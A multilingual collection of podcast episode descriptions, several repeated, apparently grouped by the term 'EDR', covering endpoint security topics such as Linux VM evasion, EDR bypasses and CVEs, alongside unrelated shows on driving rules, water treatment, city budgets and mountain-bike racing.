automatiquement le mercredi, il est prudent de faire une sauvegarde le mardi pour pouvoir restaurer rapidement en cas de problème. Cette règle s'applique également aux serveurs internes, même si certains secteurs comme le manufacturier ou l'industriel peuvent nécessiter une approche plus nuancée. Il est rappelé que dans le cadre de Sécuritaire Canada, une des questions d'évaluation porte justement sur l'activation du patching automatique pour les postes de travail, ce qui devrait être une pratique standard. La gestion des sauvegardes Le quatrième élément essentiel concerne les sauvegardes. Une recommandation cruciale est de ne jamais joindre les sauvegardes au domaine. L'équipe partage plusieurs anecdotes illustrant les conséquences d'une mauvaise gestion des sauvegardes, comme la perte de dix ans de photos personnelles ou l'impossibilité d'accéder à une sauvegarde chiffrée dont le mot de passe était uniquement stocké sur la machine principale défaillante. La qualité d'une sauvegarde est égale à la dernière fois qu'elle a été testée. Les experts ont vu des situations catastrophiques où des organisations pensaient avoir des sauvegardes fonctionnelles mais ne les avaient jamais testées, pour découvrir leur inefficacité au moment d'un incident. Les sauvegardes ne servent pas uniquement en cas d'incident de sécurité, mais aussi lors de bris matériels, d'incendies ou d'autres catastrophes. Un conseil important : bien que le chiffrement des sauvegardes soit essentiel, il faut s'assurer que la clé principale n'est pas uniquement stockée sur le système sauvegardé. Il en va de même pour le mot de passe maître d'un gestionnaire de mots de passe, qui devrait être conservé sur papier quelque part en lieu sûr. Mesures complémentaires Au-delà de ces quatre piliers fondamentaux, l'équipe propose quelques mesures additionnelles. Pour les entreprises ayant un site web, l'utilisation d'un service de proxy comme Cloudflare permet d'ajouter une couche de protection accessible, voire quasi gratuite pour les PME. Bien que non infaillible, cette solution offre de la détection et une protection contre les exploits potentiels, tout en améliorant la performance et la rapidité du site. Pour les organisations utilisant Active Directory, deux outils gratuits sont recommandés : Purple Knight de Semperis et Pink Castle (récemment acquis par Tenable). Ces outils permettent de réaliser des audits de configuration et fournissent un score de sécurité sans avoir à engager immédiatement un auditeur externe coûteux. Ils génèrent des rapports en HTML, PDF ou Excel permettant d'identifier et de corriger les problèmes de configuration les plus évidents. L'importance de la base L'équipe insiste sur le fait qu'avant d'investir dans des outils complexes et coûteux comme la surveillance du dark web, il est primordial d'avoir une base solide. Comme pour une maison, si les fondations sont bancales, la plus belle construction s'effondrera. La bonne nouvelle est que cette base n'est pas nécessairement coûteuse et que de nombreux outils gratuits ou peu dispendieux existent pour établir un diagnostic et améliorer sa posture de sécurité. Un dernier point crucial, qui fera l'objet d'un épisode ultérieur, concerne la sensibilisation des employés. Ceux-ci peuvent être le meilleur allié ou la pire faiblesse d'une organisation. Il ne s'agit pas d'une formation ponctuelle mais d'un effort continu. En conclusion, les experts rappellent que ces éléments de base sont précisément ceux qui sont vérifiés dans les formulaires d'assurance et les certifications. Prendre ces mesures préventives est comparable à une visite médicale préventive : c'est beaucoup moins coûteux et traumatisant qu'une opération d'urgence suite à un incident majeur. Consulter un expert pour mettre en place ces mesures de base coûte généralement moins cher que de gérer les conséquences d'une cyberattaque. Collaborateurs Nicolas-Loïc Fortin Dominique Derrier Cyndie Feltz Nicholas Milot Crédits Montage par Intrasecure inc Locaux virtuels par Riverside.fm

Gestir okkar í kvöld eru Björn Bragi uppistandari og sjónvarpsmaður og Jóhann Alfreð uppistandari og lögfræðingur.Umræðuefni í þættinum:Fréttir vikunnarVesen & TaskmasterPúðursykurTottenhamBannað að hlæjaKvissÁramótaskaupiðEdrúlíf / á toppnum án áfengisGolfMið ÍslandRiddaraspurningarÞessi þáttur er í boði:KALDIWOLTÍslandssjóðirSmáríkiðGrillmarkaðurinnOrka NáttúrunnarDineoutHappatreyjurAPRÓSjöstrandLengjanSubwayDave&JonsFrumherjiKEMIEagle golfferðirNjótið vel kæru hlustendur.

ඕස්ට්‍රේලියාවේ EDR, නොහොත් Experienced Driver Recognition පද්ධතියේ මෑතකදී සිද්ධ වූ විශේෂ වෙනස්කම් පිළිබඳව SBS සිංහල සේවය සිදු කල සාකච්ඡාවට සවන් දෙන්න

Segment 1: Interview with Rob Allen It's the Year of the (Clandestine) Linux Desktop! As if EDR evasions weren't enough, attackers are now employing yet another method to hide their presence on enterprise systems: deploying tiny Linux VMs. Attackers are using Hyper-V and/or WSL to deploy tiny (120MB disk space and 256MB memory) Linux VMs to host a custom reverse shell and reverse proxy. In this segment, we'll discuss strategies and mitigations to battle this novel technique with Rob Allen from Threatlocker. Segment Resources: Pro-Russian Hackers Use Linux VMs to Hide in Windows Russian Hackers Abuse Hyper-V to Hide Malware in Linux VMs Qilin ransomware abuses WSL to run Linux encryptors in Windows This segment is sponsored by ThreatLocker. Visit https://securityweekly.com/threatlocker to learn more about them! Segment 2: Topic - Threat Modeling Humanoid Robots We're entering the age of human-shaped robots, so it seems like a good time to talk about the fact that they ALREADY HAVE CVEs assigned to them. I guess this isn't a terrible thing - John Connor might have had an easier time if he could simply hack the terminators from a distance... Resources https://www.unitree.com/H2 (watch the video!) China's humanoid robots get factory jobs as UBTech's model scores US$112 million in orders The big reveal: Xpeng founder unzips humanoid robot to prove it's not human Exploit Allows for Takeover of Fleets of Unitree Robots - Security researchers find a wormable vulnerability 100-page Paper: The Cybersecurity of a Humanoid Robot 5-page Paper: Cybersecurity AI: Humanoid Robots as Attack Vectors Amazingly, $300 smart vacuums have some of the same exact vulnerabilities and backdoors built into them as the $16,000 humanoid robots! The Day My Smart Vacuum Turned Against Me Segment 3: Weekly News Finally, in the enterprise security news, A $435M venture round A $75M seed round a few acquisitions the producer of the movie Half Baked bought a spyware company AI isn't going well, or is it? maybe we just need to adopt it more slowly and deliberately? ad-blockers are enterprise best practices firewalls and VPNs are security risks, according to insurance claims could you power an entire house with disposable vapes? All that and more, on this episode of Enterprise Security Weekly. Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw-433

Segment 1: Interview with Rob Allen It's the Year of the (Clandestine) Linux Desktop! As if EDR evasions weren't enough, attackers are now employing yet another method to hide their presence on enterprise systems: deploying tiny Linux VMs. Attackers are using Hyper-V and/or WSL to deploy tiny (120MB disk space and 256MB memory) Linux VMs to host a custom reverse shell and reverse proxy. In this segment, we'll discuss strategies and mitigations to battle this novel technique with Rob Allen from Threatlocker. Segment Resources: Pro-Russian Hackers Use Linux VMs to Hide in Windows Russian Hackers Abuse Hyper-V to Hide Malware in Linux VMs Qilin ransomware abuses WSL to run Linux encryptors in Windows This segment is sponsored by ThreatLocker. Visit https://securityweekly.com/threatlocker to learn more about them! Segment 2: Topic - Threat Modeling Humanoid Robots We're entering the age of human-shaped robots, so it seems like a good time to talk about the fact that they ALREADY HAVE CVEs assigned to them. I guess this isn't a terrible thing - John Connor might have had an easier time if he could simply hack the terminators from a distance... Resources https://www.unitree.com/H2 (watch the video!) China's humanoid robots get factory jobs as UBTech's model scores US$112 million in orders The big reveal: Xpeng founder unzips humanoid robot to prove it's not human Exploit Allows for Takeover of Fleets of Unitree Robots - Security researchers find a wormable vulnerability 100-page Paper: The Cybersecurity of a Humanoid Robot 5-page Paper: Cybersecurity AI: Humanoid Robots as Attack Vectors Amazingly, $300 smart vacuums have some of the same exact vulnerabilities and backdoors built into them as the $16,000 humanoid robots! The Day My Smart Vacuum Turned Against Me Segment 3: Weekly News Finally, in the enterprise security news, A $435M venture round A $75M seed round a few acquisitions the producer of the movie Half Baked bought a spyware company AI isn't going well, or is it? maybe we just need to adopt it more slowly and deliberately? ad-blockers are enterprise best practices firewalls and VPNs are security risks, according to insurance claims could you power an entire house with disposable vapes? All that and more, on this episode of Enterprise Security Weekly. Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw-433

Segment 1: Interview with Rob Allen It's the Year of the (Clandestine) Linux Desktop! As if EDR evasions weren't enough, attackers are now employing yet another method to hide their presence on enterprise systems: deploying tiny Linux VMs. Attackers are using Hyper-V and/or WSL to deploy tiny (120MB disk space and 256MB memory) Linux VMs to host a custom reverse shell and reverse proxy. In this segment, we'll discuss strategies and mitigations to battle this novel technique with Rob Allen from Threatlocker. Segment Resources: Pro-Russian Hackers Use Linux VMs to Hide in Windows Russian Hackers Abuse Hyper-V to Hide Malware in Linux VMs Qilin ransomware abuses WSL to run Linux encryptors in Windows This segment is sponsored by ThreatLocker. Visit https://securityweekly.com/threatlocker to learn more about them! Segment 2: Topic - Threat Modeling Humanoid Robots We're entering the age of human-shaped robots, so it seems like a good time to talk about the fact that they ALREADY HAVE CVEs assigned to them. I guess this isn't a terrible thing - John Connor might have had an easier time if he could simply hack the terminators from a distance... Resources https://www.unitree.com/H2 (watch the video!) China's humanoid robots get factory jobs as UBTech's model scores US$112 million in orders The big reveal: Xpeng founder unzips humanoid robot to prove it's not human Exploit Allows for Takeover of Fleets of Unitree Robots - Security researchers find a wormable vulnerability 100-page Paper: The Cybersecurity of a Humanoid Robot 5-page Paper: Cybersecurity AI: Humanoid Robots as Attack Vectors Amazingly, $300 smart vacuums have some of the same exact vulnerabilities and backdoors built into them as the $16,000 humanoid robots! The Day My Smart Vacuum Turned Against Me Segment 3: Weekly News Finally, in the enterprise security news, A $435M venture round A $75M seed round a few acquisitions the producer of the movie Half Baked bought a spyware company AI isn't going well, or is it? maybe we just need to adopt it more slowly and deliberately? ad-blockers are enterprise best practices firewalls and VPNs are security risks, according to insurance claims could you power an entire house with disposable vapes? All that and more, on this episode of Enterprise Security Weekly. Show Notes: https://securityweekly.com/esw-433

Segment 1: Interview with Rob Allen It's the Year of the (Clandestine) Linux Desktop! As if EDR evasions weren't enough, attackers are now employing yet another method to hide their presence on enterprise systems: deploying tiny Linux VMs. Attackers are using Hyper-V and/or WSL to deploy tiny (120MB disk space and 256MB memory) Linux VMs to host a custom reverse shell and reverse proxy. In this segment, we'll discuss strategies and mitigations to battle this novel technique with Rob Allen from Threatlocker. Segment Resources: Pro-Russian Hackers Use Linux VMs to Hide in Windows Russian Hackers Abuse Hyper-V to Hide Malware in Linux VMs Qilin ransomware abuses WSL to run Linux encryptors in Windows This segment is sponsored by ThreatLocker. Visit https://securityweekly.com/threatlocker to learn more about them! Segment 2: Topic - Threat Modeling Humanoid Robots We're entering the age of human-shaped robots, so it seems like a good time to talk about the fact that they ALREADY HAVE CVEs assigned to them. I guess this isn't a terrible thing - John Connor might have had an easier time if he could simply hack the terminators from a distance... Resources https://www.unitree.com/H2 (watch the video!) China's humanoid robots get factory jobs as UBTech's model scores US$112 million in orders The big reveal: Xpeng founder unzips humanoid robot to prove it's not human Exploit Allows for Takeover of Fleets of Unitree Robots - Security researchers find a wormable vulnerability 100-page Paper: The Cybersecurity of a Humanoid Robot 5-page Paper: Cybersecurity AI: Humanoid Robots as Attack Vectors Amazingly, $300 smart vacuums have some of the same exact vulnerabilities and backdoors built into them as the $16,000 humanoid robots! The Day My Smart Vacuum Turned Against Me Segment 3: Weekly News Finally, in the enterprise security news, A $435M venture round A $75M seed round a few acquisitions the producer of the movie Half Baked bought a spyware company AI isn't going well, or is it? maybe we just need to adopt it more slowly and deliberately? ad-blockers are enterprise best practices firewalls and VPNs are security risks, according to insurance claims could you power an entire house with disposable vapes? All that and more, on this episode of Enterprise Security Weekly. Show Notes: https://securityweekly.com/esw-433

EDr. AJ Kolhari discusses Russia's successful test of the nuclear-powered Burevestnik cruise missile, which flew 14,000 km for 15 hours. The missile captures and compresses air, heating it over a nuclear reactor to create thrust. Kulhari emphasizes the danger because it flies low (50 to 100 m) and is hard to detect. He notes this nuclear propulsion technology, or similar ramjet designs, could revolutionize commercial travel and be applied to flight on Mars, using its CO₂ atmosphere for heating. 1958

Hackers use Windows Hyper-V to evade EDR detection Critical Cisco UCCX flaw lets attackers run commands as root The Louvre's video security password was reportedly Louvre  Huge thanks to our sponsor, ThreatLocker Imagine having the power to decide exactly what runs in your IT environment — and blocking everything else by default. That's what ThreatLocker delivers. As a zero-trust endpoint protection platform, ThreatLocker fills the gaps traditional solutions leave behind, giving your business stronger security and control. Don't just react to threats — stop them with ThreatLocker. Find the stories behind the headlines at CISOseries.com.

Send us a textA single Windows shortcut can open the door to espionage—and that's exactly where we begin. We break down a fresh LNK exploit campaign to show how hidden command execution and DLL sideloading slip past busy teams, then pivot into the core defense most organizations underuse: disciplined configuration management. From baselines and version control to change boards and rapid rollback, we map the habits and tools that turn chaos into control.We walk through building secure, realistic baselines with CIS Benchmarks and NIST 800‑128, and why “simple and enforceable” beats “perfect and ignored.” You'll hear how least privilege for change stops shadow tweaks, how EDR and application firewalls catch command and control, and how automation with Ansible, SCCM, and Terraform keeps fleets consistent. We spotlight the CMDB as a living source of truth—only valuable if you maintain ownership, automate updates, and report on drift so leadership and risk teams can act.Change governance becomes your stabilizer. A change control board aligns IT, security, operations, risk, and compliance before big moves, while an emergency change advisory board authorizes fast action for zero‑days and incidents with a strict post‑implementation review. We break down the full change lifecycle—request, impact analysis, staging, implementation, verification, CMDB updates—and the common pitfalls to avoid, including undocumented changes, brittle rollbacks, and ignoring post‑change scan results. Expect practical guidance on when to auto‑patch Windows, how to iterate quarterly without overengineering, and what metrics prove progress.If you're aiming to master CISSP Domain 7 or just want fewer outages and faster recovery, this conversation gives you a clear blueprint to reduce attack surface and increase stability. If it helps, share it with a teammate, subscribe for more deep dives, and leave a quick review so we can keep improving for you.Gain exclusive access to 360 FREE CISSP Practice Questions at FreeCISSPQuestions.com and have them delivered directly to your inbox! Don't miss this valuable opportunity to strengthen your CISSP exam preparation and boost your chances of certification success. Join now and start your journey toward CISSP mastery today!

Dr. Anton Chuvakin, Security Advisor at Office of the CISO, Google Cloud and a recognized expert in SIEM, log management, and PCI DSS compliance, will help us cut through the buzzwords and discuss modern security operations.Join the Defender Fridays community, live every Friday, to discuss the dynamic world of information security in a collaborative space with seasoned professionals.Dr. Chuvakin is now involved with security solution strategy at Google Cloud, where he arrived via Chronicle Security (an Alphabet company) acquisition in July 2019. He is also a co-host of Cloud Security Podcast.Until June 2019, Dr. Anton Chuvakin was a Research VP and Distinguished Analyst at Gartner for Technical Professionals (GTP) Security and Risk Management Strategies (SRMS) team. At Gartner he covered a broad range of security operations and detection and response topics, and is credited with inventing the term "EDR." He is a recognized security expert in the field of SIEM, log management and PCI DSS compliance. He is an author of books "Security Warrior", "PCI Compliance", "Logging and Log Management" and a contributor to "Know Your Enemy II", "Information Security Management Handbook" and others. Anton has published dozens of papers on log management, SIEM, correlation, security data analysis, PCI DSS, honeypots, etc. His blog securitywarrior.org was one of the most popular in the industry.Support our show by sharing your favorite episodes with a friend, subscribe, give us a rating or leave a comment on your podcast platform. This podcast is brought to you by LimaCharlie, maker of the SecOps Cloud Platform, infrastructure for SecOps where everything is built API first. Scale with confidence as your business grows. Start today for free at limacharlie.io.

Electrodialysis is making a comeback. Once niche, ED and EDR are being reinvented with smarter membranes, modular stack designs, and solar-powered operation. BlueTech Analyst Dr. Vishal Wagholikar joins Rhys and Divya to explore how these innovations could enable off-grid desalination, resource recovery, and low-cost acid and base generation.The conversation then shifts to policy, with the proposed Advancing Water Reuse Act offering a 30% U.S. tax credit that could transform industrial reuse economics—boosting uptake among data centers, semiconductor plants, and utilities.They close on lithium, spotlighting the UK's first commercial DLE project and a Veolia patent targeting zero-liquid discharge and circular lithium recovery. Together, these stories reveal where technology, regulation, and resource security now intersect in water innovation.Join us for the upcoming web briefings in November:20 November: Transforming Nitrogen Management: From Cost to Opportunity27th November: Ceramic Membranes: Market & Technology Update 2025--Presented by BlueTech Research®, Actionable Water Technology Market Intelligence. Watch the trailer of Our Blue World: A Water Odyssey. Get involved, and learn more on the website: braveblue.world

Kybernetická bezpečnosť už dávno nie je len o antivíruse a heslách. Hoci sa firmy na Slovensku v základnej hygiene zlepšili, mnohé stále podceňujú sofistikovanejšie hrozby. Často investujú do pokročilých technológií, no nemajú kvalifikovaných ľudí, ktorí by ich vedeli správne vyhodnocovať a manažovať. Prečo je dôležité oddeliť IT od bezpečnosti a aké sú možnosti pre firmy, ktoré si vlastný bezpečnostný tím nemôžu dovoliť?V novom dieli podcastu SHARE sa moderátor Maroš Žofčin rozpráva s Júliusom Seleckým, Solution Architectom spoločnosti Eset, o reálnom stave kybernetickej bezpečnosti v slovenských firmách, o najčastejších chybách a o riešeniach, ako je manažovaná detekcia a reakcia (MDR). Podcast prinášame v spolupráci so spoločnosťou Eset.Pripravte sa na budúcnosť s knihou od redaktorov Živé.sk „Umelá inteligencia: Pripravte sa na budúcnosť“. Teraz aj ako ebook! TIP: https://zive.aktuality.sk/clanok/0RfdZVW/nahliadnite-do-buducnosti-vydavame-knihu-o-umelej-inteligencii/V podcaste hovoríme aj o týchto témach:V čom sa slovenské firmy zlepšili (heslá, aktualizácie) a čo stále podceňujú.Prečo by IT oddelenie a bezpečnostné oddelenie mali byť striktne oddelené.Analýza rizík: Ako majú firmy identifikovať, čo je pre ich biznis kľúčové.Čo sú EDR a XDR systémy a prečo bežný antivírus už nestačí.Aké sú možnosti pre firmy, ktoré nemajú vlastných bezpečnostných expertov (MDR).Téme sa venujeme aj v článku: https://zive.aktuality.sk/clanok/nmdWnCW/firmy-maju-antivirusy-no-chyba-im-tato-klucova-vec-mnohe-na-to-doplatili/ Podcast SHARE pripravuje magazín Živé.sk.

Ransomware detection is more complex than most organizations realize. In this episode, cybersecurity expert Mike Saylor breaks down the real-world signs of ransomware attacks—from users complaining about slow computers to smart devices acting strangely. We explore polymorphic malware that changes based on its target, the risks posed by managed service providers using shared credentials, and why milliseconds matter in ransomware detection and response. Mike explains the difference between EDR, XDR, SIEM, and SOAR tools, helping you understand which security solutions you actually need. We also discuss why 24/7 monitoring is non-negotiable and how even small businesses can afford proper ransomware detection capabilities. If you're trying to protect your organization without breaking the bank, this episode offers practical guidance on building your security stack and knowing when to call in expert help.

Send us a textYou can harden your network and still miss the front door: aging edge devices with elevated access, thin logging, and long‑ignored firmware. We dig into the uncomfortable truth behind “set it and forget it” firewalls, VPNs, and gateways, then lay out a practical Domain 7 playbook that helps you detect faster, respond cleaner, and recover without chaos.We start with the incident management sequence that actually works under pressure—detection, response, mitigation, reporting, recovery, remediation, and lessons learned—showing how legal timelines, stakeholder updates, and RTO/RPO planning fit together. From there, we map the controls that pull their weight: next‑gen firewalls and WAFs, IDS/IPS, smart whitelisting and blacklisting, sandboxing that anticipates time‑bomb malware, and when to lean on EDR, MDR, and UEBA to cut through alert fatigue.Then we get hands‑on with vulnerability and patch management, focusing on asset inventory, critical‑first prioritization, scanning automation, and staged deployments with real rollback plans. We connect the dots to change management so fixes don't become outages. Resilience gets its due: backup integrity and rotation, hot/warm/cold recovery sites, multi‑region processing, HA pairs, QoS to preserve critical traffic, and fault‑tolerant design that keeps services running when parts fail.Finally, we round out security operations with disaster recovery drills—from tabletop to full cutover—plus business continuity planning that aligns cyber recovery with revenue‑critical processes. Physical security and personal safety close the loop: layered access, surveillance, environmental controls, and travel and duress protocols that protect your people as well as your data. If you're preparing for the CISSP or sharpening a real program, you'll leave with concrete steps to reduce risk now and a roadmap to mature over time.Enjoyed this deep dive? Subscribe, share with a teammate who owns Domain 7, and leave a quick review to help others find the show. Your feedback shapes future topics and tools we build for you.Gain exclusive access to 360 FREE CISSP Practice Questions at FreeCISSPQuestions.com and have them delivered directly to your inbox! Don't miss this valuable opportunity to strengthen your CISSP exam preparation and boost your chances of certification success. Join now and start your journey toward CISSP mastery today!

In this episode, Dr. Dave Chatterjee speaks with Anupam Upadhyay, Senior Vice President, Product Management, Palo Alto Networks, a seasoned product and cybersecurity leader, to unpack the “new browser wars” and why enterprise browsers are fast becoming a core battleground in the fight for digital trust. Drawing on over two decades of experience spanning Cisco, startups, and Palo Alto, Upadhyay traces the evolution of the humble browser from a passive content viewer into the primary interface for cloud applications, collaboration tools, and sensitive business data.The conversation examines the browser's expanding role as both a productivity hub and a primary attack vector—accounting for over 90 percent of initial intrusions via phishing, malicious extensions, or session hijacking. Through the lens of the Commitment-Preparedness-Discipline (CPD) Framework, Dr. Chatterjee and Anupam Upadhyay emphasize that securing the enterprise browser is not merely a technical exercise but a governance imperative: leadership commitment to zero-trust principles, preparedness through hardened configurations and employee training, and disciplined enforcement of consistent controls across devices and partners.Time Stamps• 00:49 — Dave's introduction and guest overview.• 03:00 — Anupam Upadhyay's career journey and reinvention at Palo Alto Networks.• 05:00 — Historical context: how browsers stayed outside the security spotlight.• 08:40 — Cloud and SaaS migration shifting business to the browser.• 11:20 — Emerging browser threats and data sanctity concerns.• 14:30 — Malicious extensions and the limits of traditional EDR.• 16:07 — Browser security as part of Zero Trust architecture.• 18:30 — Balancing security and user experience.• 22:10 — Operating in hostile environments and credential revocation.• 25:00 — Dr. Chatterjee introduces the CPD framework for governance.• 28:45 — Implementation and user adoption challenges.• 30:00 — Continuous testing and discipline in browser security.• 33:05 — Closing takeaways on Zero Trust mindset and defense-in-depth.Podcast summary with discussion highlights - https://www.dchatte.com/episode-93-the-new-browser-wars-why-the-enterprise-browser-has-become-cybersecuritys-next-battleground/Connect with Host Dr. Dave Chatterjee LinkedIn: https://www.linkedin.com/in/dchatte/ Website: https://dchatte.com/Books PublishedThe DeepFake ConspiracyCybersecurity Readiness: A Holistic and High-Performance ApproachArticles PublishedRamasastry, C. and Chatterjee, D. (2025). Trusona: Recruiting For The Hacker Mindset, Ivey Publishing, Oct 3, 2025.Chatterjee, D. and Leslie, A. (2024). “Ignorance is not bliss: A...

Three Buddy Problem (Episode 68): The buddies are trapped in timezone hell with cross-country travel this week. In this special episode, we present Juan Andres Guerrero-Saade's LABScon 2025 keynote-day presentation on the state of cybersecurity and why this phase of our collective project has failed, and how to build something smarter, more sustainable, and deeply interconnected in its place. Juanito traces the field's evolution from chaos to consolidation, weaving in cybernetics, standardization, and the dawning coexistence of human and artificial evaluative power. The result is part philosophical sermon, part rallying cry, an invitation to reject the industry's slave morality, rethink our tools, and steer the next era of defense with intention.

On this week's meeting agenda: • Aidan escaped the sub-basement and caught a showing of The Master Plan at the newly renovated Globe Theatre. • Admin has been talking for months about how they changed the city's Design Standards so that new residential roads will be wider. How did that happen? When did that happen? Why did that happen? We have the backstory on that. • Really good news from the Housing Accelerator front! Yay! • Economic Development Regina presented their 2026 budget to city council. It did not go well. • The Regina Public Library also presented their 2026 budget to city council. It didn't go great either but at least it went better than EDR's. • The Queen City Improvement Bureau's Halloween-adjacent 10th Anniversary LIVE Show is coming up October 29, 7pm at the Artesian on 13th! • The mayor made a big funding announcement for downtown. Note: Apologies for how Paul's voice sounds like a gravel quarry that's smoked a pack of cigarettes a day for 35 years. The doctors say there's nothing modern medicine can do to speed up his vocal recovery and the satanic rituals have not helped.

First up is a technical segment on UEFI shells: determining if they contain dangerous functionality that allows attackers to bypass Secure Boot. Then in the security news: Your vulnerability scanner is your weakest link Scams that almost got me The state of EDR is not good You don't need to do that on a phone or Raspberry PI Hash cracking and exploits Revisiting LG WebOS Hardening Docker images Hacking Moxa NPort Shoddy academic research The original sin of computing Bodycam hacking A new OS for ESP32 The AI bubble is going to burt Mobile VPNs are not always secure Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw-896

First up is a technical segment on UEFI shells: determining if they contain dangerous functionality that allows attackers to bypass Secure Boot. Then in the security news: Your vulnerability scanner is your weakest link Scams that almost got me The state of EDR is not good You don't need to do that on a phone or Raspberry PI Hash cracking and exploits Revisiting LG WebOS Hardening Docker images Hacking Moxa NPort Shoddy academic research The original sin of computing Bodycam hacking A new OS for ESP32 The AI bubble is going to burt Mobile VPNs are not always secure Show Notes: https://securityweekly.com/psw-896

First up is a technical segment on UEFI shells: determining if they contain dangerous functionality that allows attackers to bypass Secure Boot. Then in the security news: Your vulnerability scanner is your weakest link Scams that almost got me The state of EDR is not good You don't need to do that on a phone or Raspberry PI Hash cracking and exploits Revisiting LG WebOS Hardening Docker images Hacking Moxa NPort Shoddy academic research The original sin of computing Bodycam hacking A new OS for ESP32 The AI bubble is going to burt Mobile VPNs are not always secure Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw-896

First up is a technical segment on UEFI shells: determining if they contain dangerous functionality that allows attackers to bypass Secure Boot. Then in the security news: Your vulnerability scanner is your weakest link Scams that almost got me The state of EDR is not good You don't need to do that on a phone or Raspberry PI Hash cracking and exploits Revisiting LG WebOS Hardening Docker images Hacking Moxa NPort Shoddy academic research The original sin of computing Bodycam hacking A new OS for ESP32 The AI bubble is going to burt Mobile VPNs are not always secure Show Notes: https://securityweekly.com/psw-896

In this episode of The Cybersecurity Defenders Podcast, we discuss some intel being shared in the LimaCharlie community.A newly disclosed vulnerability in Redis, dubbed RediShell and tracked as CVE-2025-49844, affects all Redis versions and carries a maximum CVSS score of 10.0.Cisco has disclosed a critical zero-day vulnerability—CVE-2025-20352—affecting its widely deployed IOS and IOS XE software, confirming active exploitation in the wild.Researchers at NCC Group have found that voice cloning technology has reached a level where just five minutes of recorded audio is enough to generate convincing voice clones in real time.A China-linked cyber-espionage group, tracked as UNC5221, has been systematically targeting network infrastructure appliances that lack standard endpoint detection and response (EDR) support.Dutch authorities have arrested two 17-year-old boys suspected of being recruited by pro-Russian hackers to carry out surveillance activities.Support our show by sharing your favorite episodes with a friend, subscribe, give us a rating or leave a comment on your podcast platform.This podcast is brought to you by LimaCharlie, maker of the SecOps Cloud Platform, infrastructure for SecOps where everything is built API first. Scale with confidence as your business grows. Start today for free at limacharlie.io.

This week we kick things off with a special interview: Kieran Human from Threat Locker talks about EDR bypasses and other special projects. In the security news: Hacking TVs Flushable wipes are not the only problem People just want to spy on their pets, except the devices can be hacked Linux EDR is for the birds What does my hat say we love exploits and hashes ESP32s in your router RF signal generator on a PI Zero Mic-E-Mouse and other things that will probably never happen, until they do Hacking with money Uninitialized variables and other things the compiler should catch Breaking out of the shell Hacking with sound, for real, not just another side channel attack Bring back 2G When the game engine gets hacked Oracle 0-days This segment is sponsored by ThreatLocker. Visit https://securityweekly.com/threatlocker to learn more about them! Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw-895

This week we kick things off with a special interview: Kieran Human from Threat Locker talks about EDR bypasses and other special projects. In the security news: Hacking TVs Flushable wipes are not the only problem People just want to spy on their pets, except the devices can be hacked Linux EDR is for the birds What does my hat say we love exploits and hashes ESP32s in your router RF signal generator on a PI Zero Mic-E-Mouse and other things that will probably never happen, until they do Hacking with money Uninitialized variables and other things the compiler should catch Breaking out of the shell Hacking with sound, for real, not just another side channel attack Bring back 2G When the game engine gets hacked Oracle 0-days This segment is sponsored by ThreatLocker. Visit https://securityweekly.com/threatlocker to learn more about them! Show Notes: https://securityweekly.com/psw-895

This week we kick things off with a special interview: Kieran Human from Threat Locker talks about EDR bypasses and other special projects. In the security news: Hacking TVs Flushable wipes are not the only problem People just want to spy on their pets, except the devices can be hacked Linux EDR is for the birds What does my hat say we love exploits and hashes ESP32s in your router RF signal generator on a PI Zero Mic-E-Mouse and other things that will probably never happen, until they do Hacking with money Uninitialized variables and other things the compiler should catch Breaking out of the shell Hacking with sound, for real, not just another side channel attack Bring back 2G When the game engine gets hacked Oracle 0-days This segment is sponsored by ThreatLocker. Visit https://securityweekly.com/threatlocker to learn more about them! Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw-895

In the world of cybersecurity, there are big lies that have been perpetuated about compliance, fixability and communication--and it's time to burn it all down and start over.  Many experts see one main cybersecurity truth, especially about AI, SIEM, EDR and related business technology. By examining the intersection of AI, cybersecurity, and compliance, we can gain a deeper understanding of the lies that have been told about the state of cybersecurity and work towards a more secure future. Tune in to this thought-provoking Send us a textGrowth without Interruption. Get peace of mind. Stay Competitive-Get NetGain. Contact NetGain today at 844-777-6278 or reach out online at www.NETGAINIT.com Support the show

Three Buddy Problem - Episode 65: We zero in on one of the biggest security stories of the year: the discovery of a persistent multi-stage bootkit implanting malware on Cisco ASA firewalls. Details on a new campaign, tied to the same threat actors behind ArcaneDoor, exploiting zero-days in Cisco's 5500-X series appliances, devices that sit at the heart of government and enterprise networks worldwide. Plus, Cisco's controversial handling of these disclosures, CISA's emergency deadlines for patching, the absence of IOCs and samples, and China's long-term positioning. Plus, thoughts on the Secret Service SIM farm discovery in New York and evidence of Russians APTs Turla and Gamaredon collaborating to hit Ukraine targets. Cast: Juan Andres Guerrero-Saade (https://twitter.com/juanandres_gs), Ryan Naraine (https://twitter.com/ryanaraine) and Costin Raiu (https://twitter.com/craiu).

Help Wanted: What are these odd requests about? An odd request is hitting a number of our honeypots with a somewhat unusual HTTP request header. Please let me know if you no what the request is about. https://isc.sans.edu/forums/diary/Help+Wanted+What+are+these+odd+reuqests+about/32302/ Forta GoAnywhere MFT Vulnerability Forta s GoAnywhere MFT product suffers from a critical deserialization vulnerability. Forta released an advisory disclosing the vulnerability on Thursday. https://www.fortra.com/security/advisories/product-security/fi-2025-012 EDR Freeze A new tool, EDR Freeze, allows regular users to suspend EDR processes. https://www.zerosalarium.com/2025/09/EDR-Freeze-Puts-EDRs-Antivirus-Into-Coma.html

Alright, it's time to catch up on the final round of the Enduro World Cup in Morillon and Enduro World Champs in Aletsch Arena with Morgane Charre and Greg Callaghan. Morillon was a brand new venue which the riders said featured some of the best trails they've ever raced. With the titles already decided, it was all in for those chasing the remaining overall podium places and those looking for their first taste of EDR success. Aletsch delivered a challenging sting in the season's tail to see who would take home those sought after World Champs stripes. So sit back, hit play, and enjoy this episode with Morgane Charre and Greg Callaghan. You can also watch this episode on YouTube here. Podcast Stuff Listener Offers Downtime listeners can now get 10% off of Stashed Space Rails. Stashed is the ultimate way to sort your bike storage. Their clever design means you can get way more bikes into the same space and easily access whichever one you want to ride that day. If you have 2 or more bikes in your garage, they are definitely worth checking out. Just head to stashedproducts.com/downtime and use the code DOWNTIME at the checkout for 10% off your entire order. And just so you know, we get 10% of the sale too, so it's a win win. Patreon I would love it if you were able to support the podcast via 